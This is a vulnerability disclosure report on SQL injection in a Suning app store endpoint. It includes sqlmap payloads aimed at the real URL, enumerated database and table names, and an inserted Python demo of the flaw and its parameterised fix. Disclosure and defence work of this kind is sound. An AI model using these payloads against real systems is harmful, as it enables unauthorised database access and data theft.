2014-05-11: Details reported to the vendor, awaiting the vendor's handling
2014-05-12: Vendor confirmed; details disclosed to the vendor only
2014-05-22: Details disclosed to core white hats and experts in related fields
2014-06-01: Details disclosed to regular white hats
2014-06-11: Details disclosed to intern white hats
2014-06-25: Details disclosed to the public

SQL injection
I downloaded the "Suning App Store" app from the official Suning.com client, ran some tests on it, and obtained this link:
http://appjson.suning.com/advertise.php?page=1&limit=2&sys=android&class=102
The class parameter is injectable.
---
Place: GET
Parameter: class
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=1&limit=2&sys=android&class=102 AND 5199=5199

    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: page=1&limit=2&sys=android&class=102 UNION ALL SELECT NULL,CONCAT(0x7166637271,0x7a62704f57775474664d,0x71736a6771),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: page=1&limit=2&sys=android&class=102 AND SLEEP(5)
---
[01:38:32] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.6
back-end DBMS: MySQL 5.0.11
[01:38:32] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\appjson.suning.com'
[*] shutting down at 01:38:32

---
[01:39:35] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.6
back-end DBMS: MySQL 5.0.11
[01:39:35] [INFO] fetching database users privileges
database management system users privileges:
[*] 'root'@'192.168.123.%' [1]:
    privilege: USAGE
[01:39:36] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\appjson.suning.com'
[*] shutting down at 01:39:36
available databases [6]:
[*] information_schema
[*] suning
[*] suning_app_inner
[*] suning_ios
[*] suning_win
[*] test
Database: suning [233 tables]:
Permission, action, group, temporary, activity, ad_indexfocus_img, ad_indexsoft, admin_group,
admin_module, admin_promotion, admin_user, admin_user_new, app_client, app_count_app_day, app_count_app_hour, app_count_detail,
app_count_device_day, app_count_mobile_day, app_count_user_day, app_device, app_imei, app_push_apps, app_push_log, app_software,
app_sys, app_sys_cmd, app_temp, authorize, brand_ext_inner_map, brand_external, brand_mobile_ext, brand_model_map,
bug_word, category, category_anzhi, category_icon, cloud_bootscreen, cloud_qrcode_statistics, cloud_res, ctrl,
ctrl_copy, ctrltype, ctrltype_copy, department, developer, developer_appeal, developer_msg, device_info,
device_statistics, district_day, district_hour, district_month, district_tol, district_week, down_detail, download,
download_all, download_day, download_hour, download_month, download_tol, download_week, ego_ad_indexfocus_img, ego_ad_indexsoft,
favority, feedback, feedback_detail, friend_links, game_ad_indexfocus_img, game_ad_indexsoft, game_download_all, game_download_day,
game_download_hour, game_download_month, game_download_tol, game_guess, game_soft_ranking, game_topic, game_topic_info, guess,
h5_category, h5_download_day, h5_download_hour, h5_download_month, h5_download_tol, h5_maintain_soft, h5_soft_tag, h5_software,
h5_tag, http_log, imei_day, imei_hour, imei_month, imei_tol, install_day, install_hour,
install_month, install_tol, install_week, ip_visit, keyword, list_column, log, logo_icon,
manager, market, market_ad, market_cate, market_channel, market_channel_day, market_imei_channel, mobile_brand,
model_drive, model_feedback, msg, msg_forbid, news, news_app_map, news_class, news_comment,
order_soft, os_day, os_hour, os_month, os_tol, os_week, outer_category, page_ad_indexfocus_img,
people_need, people_recommend, privilege, push_id, push_software, qrcode_channel, qrcode_channel_bak, qrcode_channel_url,
qrcode_channel_url_bak, quick_entry, ratio_day, ratio_hour, ratio_month, ratio_tol, ratio_week, recommend,
report, role_user, score, search_day, search_keywords, search_month, search_soft, search_soft_bak20140417,
search_tol, search_week, sms_statistics, sn_software, soft_guess, soft_ranking, soft_tag, soft_ver_log,
software, software_bak20131017, software_copy, software_log, software_log_copy, software_permission, software_pool, software_safe,
spread_money, spread_operation, spread_promotion_goods, spread_promotion_setting, spread_reward, spread_soft_count_day, spread_software, spread_supplier,
suit_feedback, suit_statistics, suit_statistics_day, suit_statistics_hour, suit_statistics_month, suit_version, suning_district, suning_store,
suning_user, supplier, sys_ad, sys_ad_stat, sys_ad_stat_day, sys_brand, sys_brand_info, sys_cate,
sys_soft, sys_topic, sys_topic_info, sys_word, tag, tag_app_map, term_district_day, term_district_hour,
term_district_month, term_district_tol, term_imei, term_imei_day, term_imei_hour, term_imei_month, term_imei_tol, term_install,
term_install_old, term_install_testlog, term_model_day, term_model_hour, term_model_month, term_model_tol, term_os_day, term_os_hour,
term_os_month, term_os_tol, term_ratio_day, term_ratio_hour, term_ratio_month, term_ratio_tol, term_stat_by_imei_day, term_stat_by_pack,
term_stat_by_pack_model, topic, topic_info, updatesoft_log, verify_reason, web, web_ad, web_notice, web_tag
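The finding above rests on one defect class: the numeric `class` value from the query string is placed into the SQL text unchanged, which is why sqlmap's boolean-based payload (`class=102 AND 5199=5199` versus a false condition) yields different responses. The following Python/sqlite3 snippet is an added example, not code from the report or from Suning's application; it reconstructs that defect next to the fixed version (type validation plus a bound parameter) and shows how a defender can confirm the fix with the same true/false differential. The table name `software`, its columns, the sample rows and the function names are all assumptions.

```python
import sqlite3

# Constructed stand-in for the app store's MySQL backend (assumption: the
# report names no schema; the "software" table and its columns are invented).
SEED_ROWS = [
    (1, "Demo Reader", 102),
    (2, "Demo Player", 102),
    (3, "Demo Game", 201),
]


def make_db():
    """Create an in-memory database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE software (id INTEGER, name TEXT, class INTEGER)")
    conn.executemany("INSERT INTO software VALUES (?, ?, ?)", SEED_ROWS)
    return conn


def list_apps_vulnerable(conn, class_param):
    """The defect: the raw query-string value is concatenated into SQL text.

    'class=102 AND 5199=5199' therefore becomes part of the WHERE clause and
    the DBMS evaluates attacker-supplied conditions.
    """
    sql = "SELECT id, name FROM software WHERE class = " + class_param + " LIMIT 2"
    return conn.execute(sql).fetchall()


def list_apps_fixed(conn, class_param):
    """The fix: reject anything that is not a category id, then bind it.

    With a bound parameter the DBMS receives the value as data, never as SQL,
    so appended conditions cannot change the query's meaning.
    """
    if not class_param.isdigit():
        raise ValueError("class must be a non-negative integer")
    sql = "SELECT id, name FROM software WHERE class = ? LIMIT 2"
    return conn.execute(sql, (int(class_param),)).fetchall()


def observe(handler, conn, value):
    """Run a handler and capture what a client would see: rows or an error."""
    try:
        return ("ok", handler(conn, value))
    except (ValueError, sqlite3.Error) as exc:
        return ("error", type(exc).__name__)


def boolean_blind_differential(handler, conn):
    """Regression check modelled on the boolean-based blind technique.

    Returns True when a true and a false condition appended to the same id
    produce different responses, i.e. the handler is still injectable.
    """
    true_case = observe(handler, conn, "102 AND 5199=5199")
    false_case = observe(handler, conn, "102 AND 5199=5200")
    return true_case != false_case


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler injectable:", boolean_blind_differential(list_apps_vulnerable, db))
    print("fixed handler injectable:     ", boolean_blind_differential(list_apps_fixed, db))
    print("fixed handler, class=102:     ", list_apps_fixed(db, "102"))
```

`boolean_blind_differential` is the check worth keeping in a test suite after a fix ships: it does not need the payload to succeed, only to be indistinguishable from any other malformed input, which is exactly what the validated, parameterised handler guarantees.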
You are the professionals here; surely this won't just be given 10 Rank? Asking for 15-20 Rank..

Severity: High
Vulnerability Rank: 15
Confirmed at: 2014-05-12 10:16
Thank you for your attention to Suning.com; we are arranging staff to fix this vulnerability.
None yet